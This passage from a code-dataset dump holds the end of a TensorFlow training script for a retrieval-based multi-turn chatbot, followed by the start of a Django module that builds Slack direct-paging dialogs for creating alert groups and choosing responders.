reshape(input_q, [-1])\r\n\tinput_a = reshape(input_a, [-1])\r\n\tseq_length_q = reshape(seq_length_q, [-1])\r\n\tseq_length_a = reshape(seq_length_a, [-1])\r\n\tlabels = reshape(labels, [-1])\r\n\tbatch_size = config.batch_size\r\n\r\n\tdata_len_q = len(input_q)\r\n\tbatch_len_q = data_len_q//config.max_length_q//config.max_num_utterance // batch_size * config.max_length_q * config.max_num_utterance\r\n\tdata_len_a = len(input_a)\r\n\tbatch_len_a = data_len_a//config.max_length_a // batch_size * config.max_length_a\r\n\tinput_q = tf.reshape(input_q[0 : batch_size * batch_len_q],[batch_size, batch_len_q])\r\n\r\n\tseq_length_q = tf.reshape(seq_length_q[0 : batch_size * (batch_len_q//config.max_length_q)], [batch_size, (batch_len_q//config.max_length_q)])\r\n\tinput_a = tf.reshape(input_a[0 : batch_size * batch_len_a],[batch_size, batch_len_a])\r\n\r\n\tseq_length_a = tf.reshape(seq_length_a[0 : batch_size * (batch_len_a//config.max_length_a)],[batch_size, (batch_len_a//config.max_length_a)])\r\n\t\r\n\tlabels = tf.reshape(labels[0: batch_size * (batch_len_a//config.max_length_a)], [batch_size,(batch_len_a//config.max_length_a)])\r\n\t\r\n\tepoch_size = (batch_len_a) // config.max_length_a\r\n\tepoch_size = tf.identity(epoch_size, name=\"epoch_size\")\r\n\r\n\ti = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\r\n\t\r\n\tinput_q = tf.strided_slice(input_q, [0, i * 
config.max_length_q*config.max_num_utterance], [batch_size, (i + 1) * config.max_length_q*config.max_num_utterance])\r\n\tinput_q = tf.reshape(input_q, [batch_size, config.max_num_utterance, config.max_length_q])\r\n\r\n\tseq_length_q = tf.strided_slice(seq_length_q, [0, i*config.max_num_utterance],[batch_size, (i+1)*config.max_num_utterance])\r\n\tseq_length_q = tf.reshape(seq_length_q, [batch_size, config.max_num_utterance])\r\n\r\n\tinput_a = tf.strided_slice(input_a, [0, i * config.max_length_a], [batch_size, (i + 1) * config.max_length_a])\r\n\tinput_a = tf.reshape(input_a, [batch_size, config.max_length_a])\r\n\r\n\tseq_length_a = tf.strided_slice(seq_length_a, [0, i],[batch_size, i+1])\r\n\tseq_length_a = tf.reshape(seq_length_a, [-1])\r\n\r\n\tlabels = tf.strided_slice(labels, [0, i], [batch_size, (i + 1)])\r\n\tlabels = tf.reshape(labels, [batch_size])\r\n\r\n\treturn input_q, input_a, seq_length_q, seq_length_a, labels\r\n\r\ndef loadEmbedding():\r\n\tglobal voca_size, word_to_id\r\n\tmodel = word2vec.load(FLAGS.embedding_path)\r\n\tembeddingMatrix = zeros( (voca_size, config.embedding_size), dtype=float32)\r\n\twordlist = model.vocab.tolist()\r\n\tfor word, i in word_to_id.items():\r\n\t\tif word in wordlist:\r\n\t\t\tembedding_vector = model[word]\r\n\t\telse:\r\n\t\t\tembedding_vector = zeros((1,config.embedding_size), dtype=float32)\r\n\t\t\tfor character in word:\r\n\t\t\t\tif character in wordlist:\r\n\t\t\t\t\tembedding_vector = embedding_vector + model[character]\r\n\t\t\tembedding_vector = embedding_vector / len(word)\r\n\t\tembeddingMatrix[i] = embedding_vector\r\n\treturn embeddingMatrix\r\n\r\ndef embedding(input_u, input_r):\r\n\tglobal voca_size, init\r\n\tif (FLAGS.embedding_path is not None) and (FLAGS.voca_path is not None):\r\n\t\tinitializer = loadEmbedding()\r\n\t\tembedding = tf.get_variable(name = \"embedding_m\", initializer = initializer )\r\n\telse:\r\n\t\tinitializer = tf.truncated_normal_initializer(stddev=0.01)\r\n\t\tembedding = tf.get_variable(name = \"embedding_m\", shape=(voca_size, config.embedding_size), initializer = initializer )\r\n\r\n\tembedding_u = tf.nn.embedding_lookup(embedding, input_u)\r\n\tembedding_r = tf.nn.embedding_lookup(embedding, input_r)\r\n\r\n\treturn embedding_u, embedding_r\r\n\r\ndef multiTurnResponse(config, embedding_u, embedding_r, seq_length_u, seq_length_r, labels):\r\n\r\n\tdef make_cell(num = 0):\r\n\t\tif num==0:\r\n\t\t\tcell = tf.nn.rnn_cell.GRUCell(config.rnn_dim, kernel_initializer=tf.orthogonal_initializer())\r\n\t\telse:\r\n\t\t\tcell = tf.nn.rnn_cell.GRUCell(num, kernel_initializer=tf.orthogonal_initializer())\t\t\t\r\n\t\tif config.mode==\"train\" and config.keep_prob<1:\r\n\t\t\tcell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=config.keep_prob)\r\n\t\treturn cell\r\n\r\n\tsentence_GRU = make_cell()\r\n\tfinal_GRU = make_cell(50)\r\n\tembedding_us = tf.unstack(embedding_u, num=config.max_num_utterance, axis=1)\r\n\tseq_length_us = tf.unstack(seq_length_u, num=config.max_num_utterance, axis=1)\r\n\tA_matrix = tf.get_variable('A_matrix_v', shape=(config.rnn_dim, config.rnn_dim), initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)\r\n\r\n\tembedding_r = tf.cast(embedding_r, tf.float32)\r\n\tgru_response, _ = tf.nn.dynamic_rnn(sentence_GRU, embedding_r, sequence_length=seq_length_r, dtype=tf.float32, scope='sentence_GRU')\r\n\tembedding_r = tf.transpose(embedding_r, perm=[0, 2, 1])\r\n\tgru_response = tf.transpose(gru_response, perm=[0, 2, 1])\r\n\tmatching_vectors = []\r\n\treuse 
= None\r\n\tfor embedding_u, seq_length_u in zip(embedding_us, seq_length_us):\r\n\t\tembedding_u = tf.cast(embedding_u, tf.float32)\r\n\t\tmatrix1 = tf.matmul(embedding_u, embedding_r)\r\n\t\tgru_utterance, _ = tf.nn.dynamic_rnn(sentence_GRU, embedding_u, sequence_length=seq_length_u, dtype=tf.float32, scope='sentence_GRU')\r\n\t\tmatrix2 = tf.einsum('aij,jk->aik', gru_utterance, A_matrix)\r\n\t\tmatrix2 = tf.matmul(matrix2, gru_response)\r\n\t\tmatrix = tf.stack([matrix1, matrix2], axis=3, name='matrix_stack')\r\n\r\n\t\tconv_layer = tf.layers.conv2d(matrix, filters=8, kernel_size=(3, 3), padding='VALID',\r\n\t\t\tkernel_initializer=tf.contrib.keras.initializers.he_normal(),\r\n\t\t\tactivation=tf.nn.relu, reuse=reuse, name='conv')\r\n\t\tpooling_layer = tf.layers.max_pooling2d(conv_layer, (3, 3), strides=(3, 3),\r\n\t\t\tpadding='VALID', name='max_pooling') \r\n\t\tmatching_vector = tf.layers.dense(tf.contrib.layers.flatten(pooling_layer), 50,\r\n\t\t\tkernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n\t\t\tactivation=tf.tanh, reuse=reuse, name='matching_v')\r\n\t\tmatching_vectors.append(matching_vector)\r\n\r\n\t\tif not reuse:\r\n\t\t\treuse = True\r\n\r\n\t_, last_hidden = tf.nn.dynamic_rnn(final_GRU, tf.stack(matching_vectors, axis=0, name='matching_stack'), \r\n\t\tdtype=tf.float32, time_major=True, scope='final_GRU') # TODO: check time_major\r\n\tlogits = tf.layers.dense(last_hidden, 2, kernel_initializer=tf.contrib.layers.xavier_initializer(), name='final_v')\r\n\ty_pred = tf.nn.softmax(logits)\r\n\tscore = tf.reduce_max(y_pred, axis = 1)\r\n\tlabel_pred = tf.cast(tf.argmax(y_pred, 1),tf.int32)\r\n\tlabels = tf.cast(labels, tf.int32)\r\n\tacc = tf.reduce_mean(tf.cast(tf.equal(label_pred, labels), tf.float32))\r\n\r\n\tloss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))\r\n\r\n\treturn score, acc, loss\r\n\r\n\r\nclass Model(object):\r\n\tprobs = None\r\n\tloss = None\r\n\tacc = None\r\n\toptimizer = None\r\n\tepoch_size = 0\r\n\tconfig = None\r\n\tinput_q = None \r\n\tinput_a = None\r\n\tseq_length_q = None\r\n\tseq_length_a = None\r\n\tlabels = None\r\n\r\n\tdef __init__(self, config, input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size):\r\n\t\t\r\n\t\tself.resetInput(input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size)\r\n\t\t\r\n\t\tembedding_q, embedding_a = embedding(self.input_q, self.input_a)\r\n\t\t\r\n\t\tprobs, acc, loss = multiTurnResponse(config, embedding_q, embedding_a, self.seq_length_q, self.seq_length_a, self.labels)\r\n\t\tif config.mode == \"train\":\r\n\t\t\toptimizer = tf.train.AdamOptimizer(config.learning_rate).minimize(loss)\r\n\t\telse:\r\n\t\t\toptimizer = None\r\n\t\tself.probs = probs\r\n\t\tself.loss = loss\r\n\t\tself.acc = acc\r\n\t\tself.optimizer = optimizer\r\n\t\tself.epoch_size = epoch_size\r\n\t\tself.config = config\r\n\r\n\tdef resetInput(self, input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size):\r\n\t\tself.input_q = input_q\r\n\t\tself.input_a = input_a\r\n\t\tself.seq_length_q = seq_length_q\r\n\t\tself.seq_length_a = seq_length_a\r\n\t\tself.labels = labels\r\n\t\tself.epoch_size = epoch_size\r\n\r\n\r\ndef input_model(config, path = None):\r\n\tprint(\"Getting Inputs....\")\r\n\tinput_q, input_a, seq_length_q, seq_length_a, labels = get_input(config.mode, path)\r\n\tprint(\"Getting Inputs Finish\")\r\n\tprint(\"Producing Batches....\")\r\n\tepoch_size = shape(labels)[0]//config.batch_size\r\n\tinput_q, input_a, seq_length_q, 
seq_length_a, labels = produce_input(config, input_q, input_a, seq_length_q, seq_length_a, labels)\r\n\tprint(\"Producing Batches Finish\")\r\n\r\n\treturn input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size\r\n\r\n\r\ndef run_epoch(model, session):\r\n\tstart_time = time.time()\r\n\tcosts = 0.0\r\n\titers = 0\r\n\tacc = 0.0\r\n\ttotal_loss = 0.0\r\n\tfetches = {\r\n\t\t\"loss\": model.loss,\r\n\t}\r\n\t\r\n\tif model.config.mode == \"train\":\r\n\t\tfetches[\"optimizer\"] = model.optimizer\r\n\t\tfetches[\"acc\"] = model.acc\r\n\telse :\r\n\t\tfetches[\"probs\"] = model.probs\r\n\tfor i in range(model.epoch_size):\r\n\t\tvals = session.run(fetches)\r\n\t\ttotal_loss += vals[\"loss\"]\r\n\t\titers += model.config.max_length_q\r\n\t\t\r\n\t\tif model.config.mode == \"train\":\r\n\t\t\tacc += vals[\"acc\"]\r\n\r\n\t\t\tif i % (model.epoch_size // 10) == 0:\r\n\t\t\t\tprint(\"%.3f cost : %.3f speed: %.1f wps acc: %.3f\" %\r\n\t\t\t\t(\r\n\t\t\t\t\ti * 1.0 / model.epoch_size, \r\n\t\t\t\t\tvals[\"loss\"],\r\n\t\t\t\t\titers * model.config.batch_size / (time.time() - start_time),\r\n\t\t\t\t\tacc / (iters//model.config.max_length_q),\r\n\t\t\t\t))\r\n\r\n\t\telse:\r\n\t\t\tglobal evalProbs\r\n\t\t\tevalProbs += list(vals[\"probs\"])\r\n\r\n\treturn total_loss/model.epoch_size\r\n\r\ndef handleTest():\r\n\tglobal evalProbs\r\n\tevalProbs = evalProbs[:len(evalProbs)-len(evalProbs)%10]\r\n\tevalProbs = reshape(array(evalProbs), [-1,10])\r\n\tprint(evalProbs)\r\n\ttotal = shape(evalProbs)[0]\r\n\tr10_5 = 0.0\r\n\tr10_2 = 0.0\r\n\tr10_1 = 0.0\r\n\tfor i in evalProbs:\r\n\t\tr10_5 += Evaluation(i, 5)\r\n\t\tr10_2 += Evaluation(i, 2)\r\n\t\tr10_1 += Evaluation(i, 1)\r\n\r\n\tprint(\"Accuracy: 5/10: %.3f 2/10: %.3f 1/10: %.3f \"%(r10_5/total, r10_2/total, r10_1/total))\r\n\tevalProbs = []\r\n\r\n\r\nwith tf.Graph().as_default():\r\n\tt_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size = input_model(config, FLAGS.train_path+\"0\")\r\n\td_input_q, d_input_a, d_seq_length_q, d_seq_length_a, d_labels, d_epoch_size = input_model(eval_config)\r\n\r\n\t#\ttf.reset_default_graph()\t\r\n\tif FLAGS.mode == \"train\":\r\n\t\twith tf.name_scope(\"Train\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=None) as scope:\r\n\t\t\t\ttrainModel = Model(config, t_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size)\r\n\t\t\t\tscope.reuse_variables()\r\n\t\twith tf.name_scope(\"Dev\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=True) as scope:\r\n\t\t\t\tdevModel = Model(eval_config, d_input_q, d_input_a, d_seq_length_q, d_seq_length_a, d_labels, d_epoch_size)\r\n\t\t\r\n\t\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\r\n\t\tconfig_proto = tf.ConfigProto(allow_soft_placement=True)\r\n\t\tsaver = sv.saver\r\n\t\t\r\n\t\twith sv.managed_session(config=config_proto) as session:\r\n\t\t\t\r\n\t\t\tfor i in range(config.max_epoch):\r\n\r\n\t\t\t\tfor j in range(9):\r\n\t\t\t\t\tprint(j)\r\n\t\t\t\t\ttf.reset_default_graph()\r\n\t\t\t\t\tt_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size = input_model(config, FLAGS.train_path+str(j))\r\n\t\t\t\t\ttrainModel.resetInput(t_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size)\r\n\r\n\t\t\t\t\tloss = run_epoch(trainModel, session)\r\n\t\t\t\t\t\r\n\t\t\t\t\trun_epoch(devModel, session)\r\n\t\t\t\t\thandleTest()\r\n\t\t\t\tprint(\"Epoch : %d Loss: %.3f \"%(i,loss))\r\n\t\t\t\t\r\n\t\t\t\trun_epoch(devModel, 
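handleTest above reshapes the collected scores into rows of 10 candidates and accumulates Evaluation(i, k), whose body is not included in this excerpt. A plausible recall-at-k check under the common Ubuntu-corpus assumption that index 0 of each row is the true response (that assumption is mine, not shown in the script):

import numpy as np

def evaluation(row, k):
    # Return 1.0 if the candidate at index 0 ranks within the top k scores.
    top_k = np.argsort(row)[::-1][:k]
    return 1.0 if 0 in top_k else 0.0

row = np.array([0.7, 0.9, 0.1, 0.2, 0.3, 0.05, 0.4, 0.6, 0.15, 0.25])
print(evaluation(row, 1), evaluation(row, 2), evaluation(row, 5))  # 0.0 1.0 1.0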
session)\r\n\t\t\t\thandleTest()\r\n\t\t\t\t\r\n\t\t\tif FLAGS.save_path is not None and os.path.exists(FLAGS.save_path):\r\n\t\t\t\tprint(\"Saving model to %s.\" % FLAGS.save_path)\r\n\t\t\t\tsaver.save(session, os.path.join(FLAGS.save_path,\"model.ckpt\"), global_step=sv.global_step)\r\n\r\n\telse:\r\n\t\twith tf.name_scope(\"Train\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=None) as scope:\r\n\t\t\t\t# test mode: evaluate on the eval inputs built above\r\n\t\t\t\ttestModel = Model(eval_config, d_input_q, d_input_a, d_seq_length_q, d_seq_length_a, d_labels, d_epoch_size)\r\n\t\t\t\tscope.reuse_variables()\r\n\r\n\t\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\r\n\t\tconfig_proto = tf.ConfigProto(allow_soft_placement=True)\r\n\t\tsaver = sv.saver\r\n\t\twith sv.managed_session(config=config_proto) as session:\r\n\t\t\t\r\n\t\t\trun_epoch(testModel, session)\r\n\t\t\thandleTest()","repo_name":"zedom1/nlp","sub_path":"Retrieval-based Chatbot/Multi-Turn Response/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15508,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"43554624296","text":"import json\nfrom uuid import uuid4\n\nfrom django.apps import apps\nfrom django.conf import settings\n\nfrom apps.alerts.models import AlertReceiveChannel, EscalationChain\nfrom apps.alerts.paging import (\n USER_HAS_NO_NOTIFICATION_POLICY,\n USER_IS_NOT_ON_CALL,\n check_user_availability,\n direct_paging,\n)\nfrom apps.slack.constants import PRIVATE_METADATA_MAX_LENGTH\nfrom apps.slack.scenarios import scenario_step\nfrom apps.slack.slack_client.exceptions import SlackAPIException\n\nDIRECT_PAGING_TEAM_SELECT_ID = \"paging_team_select\"\nDIRECT_PAGING_ORG_SELECT_ID = \"paging_org_select\"\nDIRECT_PAGING_USER_SELECT_ID = \"paging_user_select\"\nDIRECT_PAGING_SCHEDULE_SELECT_ID = \"paging_schedule_select\"\nDIRECT_PAGING_TITLE_INPUT_ID = \"paging_title_input\"\nDIRECT_PAGING_MESSAGE_INPUT_ID = \"paging_message_input\"\nDIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID = \"paging_additional_responders_input\"\n\nDEFAULT_TEAM_VALUE = \"default_team\"\n\n\n# selected user available actions\nDEFAULT_POLICY = \"default\"\nIMPORTANT_POLICY = \"important\"\nREMOVE_ACTION = \"remove\"\n\nITEM_ACTIONS = (\n (DEFAULT_POLICY, \"Set default notification policy\"),\n (IMPORTANT_POLICY, \"Set important notification policy\"),\n (REMOVE_ACTION, \"Remove from escalation\"),\n)\n\n\n# helpers to manage current selected users/schedules state\n\nSCHEDULES_DATA_KEY = \"schedules\"\nUSERS_DATA_KEY = \"users\"\n\n\ndef add_or_update_item(payload, key, item_pk, policy):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n metadata[key][item_pk] = policy\n updated_metadata = json.dumps(metadata)\n if len(updated_metadata) > PRIVATE_METADATA_MAX_LENGTH:\n raise ValueError(\"Cannot add entry, maximum exceeded\")\n payload[\"view\"][\"private_metadata\"] = updated_metadata\n return payload\n\n\ndef remove_item(payload, key, item_pk):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n if item_pk in metadata[key]:\n del metadata[key][item_pk]\n payload[\"view\"][\"private_metadata\"] = json.dumps(metadata)\n return payload\n\n\ndef reset_items(payload):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n for key in (USERS_DATA_KEY, SCHEDULES_DATA_KEY):\n metadata[key] = {}\n payload[\"view\"][\"private_metadata\"] = json.dumps(metadata)\n return payload\n\n\ndef get_current_items(payload, key, qs):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n items = []\n for u, p in metadata[key].items():\n item = 
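The helpers above keep the currently selected responders inside the Slack view's private_metadata JSON string, guarding against Slack's size cap before writing. A self-contained round-trip on a fake payload; PRIVATE_METADATA_MAX_LENGTH is imported from apps.slack.constants in the real module, so a small stand-in constant is used here:

import json

PRIVATE_METADATA_MAX_LENGTH = 3000  # stand-in for the imported Slack constant

payload = {"view": {"private_metadata": json.dumps({"users": {}, "schedules": {}})}}

def add_item(payload, key, item_pk, policy):
    # Same shape as add_or_update_item above: load, mutate, size-check, store.
    metadata = json.loads(payload["view"]["private_metadata"])
    metadata[key][item_pk] = policy
    updated = json.dumps(metadata)
    if len(updated) > PRIVATE_METADATA_MAX_LENGTH:
        raise ValueError("Cannot add entry, maximum exceeded")
    payload["view"]["private_metadata"] = updated
    return payload

payload = add_item(payload, "users", "42", "default")
print(payload["view"]["private_metadata"])  # {"users": {"42": "default"}, "schedules": {}}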
qs.filter(pk=u).first()\n items.append((item, p))\n return items\n\n\n# Slack scenario steps\n\n\nclass StartDirectPaging(scenario_step.ScenarioStep):\n \"\"\"Handle slash command invocation and show initial dialog.\"\"\"\n\n command_name = [settings.SLACK_DIRECT_PAGING_SLASH_COMMAND]\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n input_id_prefix = _generate_input_id_prefix()\n\n try:\n channel_id = payload[\"event\"][\"channel\"]\n except KeyError:\n channel_id = payload[\"channel_id\"]\n\n private_metadata = {\n \"channel_id\": channel_id,\n \"input_id_prefix\": input_id_prefix,\n \"submit_routing_uid\": FinishDirectPaging.routing_uid(),\n USERS_DATA_KEY: {},\n SCHEDULES_DATA_KEY: {},\n }\n initial_payload = {\"view\": {\"private_metadata\": json.dumps(private_metadata)}}\n view = render_dialog(slack_user_identity, slack_team_identity, initial_payload, initial=True)\n self._slack_client.api_call(\n \"views.open\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n )\n\n\nclass FinishDirectPaging(scenario_step.ScenarioStep):\n \"\"\"Handle page command dialog submit.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n title = _get_title_from_payload(payload)\n message = _get_message_from_payload(payload)\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n channel_id = private_metadata[\"channel_id\"]\n input_id_prefix = private_metadata[\"input_id_prefix\"]\n selected_organization = _get_selected_org_from_payload(\n payload, input_id_prefix, slack_team_identity, slack_user_identity\n )\n _, selected_team = _get_selected_team_from_payload(payload, input_id_prefix)\n user = slack_user_identity.get_user(selected_organization)\n\n # Only pass users/schedules if additional responders checkbox is checked\n selected_users, selected_schedules = None, None\n is_additional_responders_checked = _get_additional_responders_checked_from_payload(payload, input_id_prefix)\n if is_additional_responders_checked:\n selected_users = [\n (u, p == IMPORTANT_POLICY)\n for u, p in get_current_items(payload, USERS_DATA_KEY, selected_organization.users)\n ]\n selected_schedules = [\n (s, p == IMPORTANT_POLICY)\n for s, p in get_current_items(payload, SCHEDULES_DATA_KEY, selected_organization.oncall_schedules)\n ]\n\n # trigger direct paging to selected team + users/schedules\n alert_group = direct_paging(\n selected_organization,\n selected_team,\n user,\n title,\n message,\n selected_users,\n selected_schedules,\n )\n\n text = \":white_check_mark: Alert group *{}* created: {}\".format(title, alert_group.web_link)\n\n try:\n self._slack_client.api_call(\n \"chat.postEphemeral\",\n channel=channel_id,\n user=slack_user_identity.slack_id,\n text=text,\n )\n except SlackAPIException as e:\n if e.response[\"error\"] == \"channel_not_found\":\n self._slack_client.api_call(\n \"chat.postEphemeral\",\n channel=slack_user_identity.im_channel_id,\n user=slack_user_identity.slack_id,\n text=text,\n )\n else:\n raise e\n\n\n# OnChange steps, responsible for rerendering form on changed values\n\n\nclass OnPagingOrgChange(scenario_step.ScenarioStep):\n \"\"\"Reload form with updated organization.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n updated_payload = reset_items(payload)\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=updated_payload[\"trigger_id\"],\n view=view,\n 
view_id=updated_payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingTeamChange(scenario_step.ScenarioStep):\n \"\"\"Set team.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n view = render_dialog(slack_user_identity, slack_team_identity, payload)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingCheckAdditionalResponders(OnPagingOrgChange):\n \"\"\"Check/uncheck additional responders checkbox.\"\"\"\n\n\nclass OnPagingUserChange(scenario_step.ScenarioStep):\n \"\"\"Add selected to user to the list.\n\n It will perform a user availability check, pushing a new modal for additional confirmation if needed.\n \"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n selected_organization = _get_selected_org_from_payload(\n payload, private_metadata[\"input_id_prefix\"], slack_team_identity, slack_user_identity\n )\n selected_user = _get_selected_user_from_payload(payload, private_metadata[\"input_id_prefix\"])\n if selected_user is None:\n return\n\n # check availability\n availability_warnings = check_user_availability(selected_user)\n if availability_warnings:\n # display warnings and require additional confirmation\n view = _display_availability_warnings(payload, availability_warnings, selected_organization, selected_user)\n self._slack_client.api_call(\n \"views.push\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n )\n else:\n # user is available to be paged\n error_msg = None\n try:\n updated_payload = add_or_update_item(payload, USERS_DATA_KEY, selected_user.pk, DEFAULT_POLICY)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add user, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingItemActionChange(scenario_step.ScenarioStep):\n \"\"\"Reload form with updated user details.\"\"\"\n\n def _parse_action(self, payload):\n value = payload[\"actions\"][0][\"selected_option\"][\"value\"]\n return value.split(\"|\")\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload, policy=None):\n policy, key, user_pk = self._parse_action(payload)\n\n error_msg = None\n if policy == REMOVE_ACTION:\n updated_payload = remove_item(payload, key, user_pk)\n else:\n try:\n updated_payload = add_or_update_item(payload, key, user_pk, policy)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot update policy, maximum responders exceeded\"\n\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingConfirmUserChange(scenario_step.ScenarioStep):\n \"\"\"Confirm user selection despite not being available.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n\n # recreate original view state and metadata\n private_metadata = {\n \"channel_id\": metadata[\"channel_id\"],\n \"input_id_prefix\": metadata[\"input_id_prefix\"],\n 
\"submit_routing_uid\": metadata[\"submit_routing_uid\"],\n USERS_DATA_KEY: metadata[USERS_DATA_KEY],\n SCHEDULES_DATA_KEY: metadata[SCHEDULES_DATA_KEY],\n }\n previous_view_payload = {\n \"view\": {\n \"state\": metadata[\"state\"],\n \"private_metadata\": json.dumps(private_metadata),\n },\n }\n # add selected user\n selected_user = _get_selected_user_from_payload(previous_view_payload, private_metadata[\"input_id_prefix\"])\n error_msg = None\n try:\n updated_payload = add_or_update_item(\n previous_view_payload, USERS_DATA_KEY, selected_user.pk, DEFAULT_POLICY\n )\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add user, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"previous_view_id\"],\n )\n\n\nclass OnPagingScheduleChange(scenario_step.ScenarioStep):\n \"\"\"Add selected to user to the list.\n\n It will perform a user availability check, pushing a new modal for additional confirmation if needed.\n \"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload, action=None):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n selected_schedule = _get_selected_schedule_from_payload(payload, private_metadata[\"input_id_prefix\"])\n if selected_schedule is None:\n return\n\n error_msg = None\n try:\n updated_payload = add_or_update_item(payload, SCHEDULES_DATA_KEY, selected_schedule.pk, DEFAULT_POLICY)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add schedule, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\n# slack view/blocks rendering helpers\n\nDIVIDER_BLOCK = {\"type\": \"divider\"}\n\n\ndef render_dialog(slack_user_identity, slack_team_identity, payload, initial=False, error_msg=None):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n submit_routing_uid = private_metadata.get(\"submit_routing_uid\")\n\n # Get organizations available to user\n available_organizations = _get_available_organizations(slack_team_identity, slack_user_identity)\n\n if initial:\n # setup initial form\n new_input_id_prefix = _generate_input_id_prefix()\n new_private_metadata = private_metadata\n new_private_metadata[\"input_id_prefix\"] = new_input_id_prefix\n selected_organization = available_organizations.first()\n is_team_selected, selected_team = False, None\n is_additional_responders_checked = False\n else:\n # setup form using data/state\n old_input_id_prefix, new_input_id_prefix, new_private_metadata = _get_and_change_input_id_prefix_from_metadata(\n private_metadata\n )\n selected_organization = _get_selected_org_from_payload(\n payload, old_input_id_prefix, slack_team_identity, slack_user_identity\n )\n is_team_selected, selected_team = _get_selected_team_from_payload(payload, old_input_id_prefix)\n is_additional_responders_checked = _get_additional_responders_checked_from_payload(payload, old_input_id_prefix)\n\n # widgets\n team_select_blocks = _get_team_select_blocks(\n slack_user_identity, selected_organization, is_team_selected, selected_team, new_input_id_prefix\n )\n additional_responders_blocks = 
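OnPagingItemActionChange round-trips each overflow menu choice through a single pipe-delimited string, "action|key|pk", so one handler can serve every selected user and schedule row. A tiny encode/decode sketch of that convention (the encode side mirrors the option values built further below):

def encode_action(action, key, pk):
    # Pack the chosen action, the metadata key and the item pk into one value.
    return f"{action}|{key}|{pk}"

def parse_action(value):
    # Inverse of encode_action, as in OnPagingItemActionChange._parse_action.
    action, key, pk = value.split("|")
    return action, key, pk

value = encode_action("important", "users", "17")
print(parse_action(value))  # ('important', 'users', '17')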
_get_additional_responders_blocks(\n payload, selected_organization, new_input_id_prefix, is_additional_responders_checked, error_msg\n )\n\n # Add title and message inputs\n blocks = [_get_title_input(payload), _get_message_input(payload)]\n\n # Add organization select if more than one organization available for user\n if len(available_organizations) > 1:\n organization_select = _get_organization_select(\n available_organizations, selected_organization, new_input_id_prefix\n )\n blocks.append(organization_select)\n\n # Add team select and additional responders blocks\n blocks += team_select_blocks\n blocks += additional_responders_blocks\n\n view = _get_form_view(submit_routing_uid, blocks, json.dumps(new_private_metadata))\n return view\n\n\ndef _get_form_view(routing_uid, blocks, private_metadata):\n view = {\n \"type\": \"modal\",\n \"callback_id\": routing_uid,\n \"title\": {\n \"type\": \"plain_text\",\n \"text\": \"Create Alert Group\",\n },\n \"close\": {\n \"type\": \"plain_text\",\n \"text\": \"Cancel\",\n \"emoji\": True,\n },\n \"submit\": {\n \"type\": \"plain_text\",\n \"text\": \"Create\",\n },\n \"blocks\": blocks,\n \"private_metadata\": 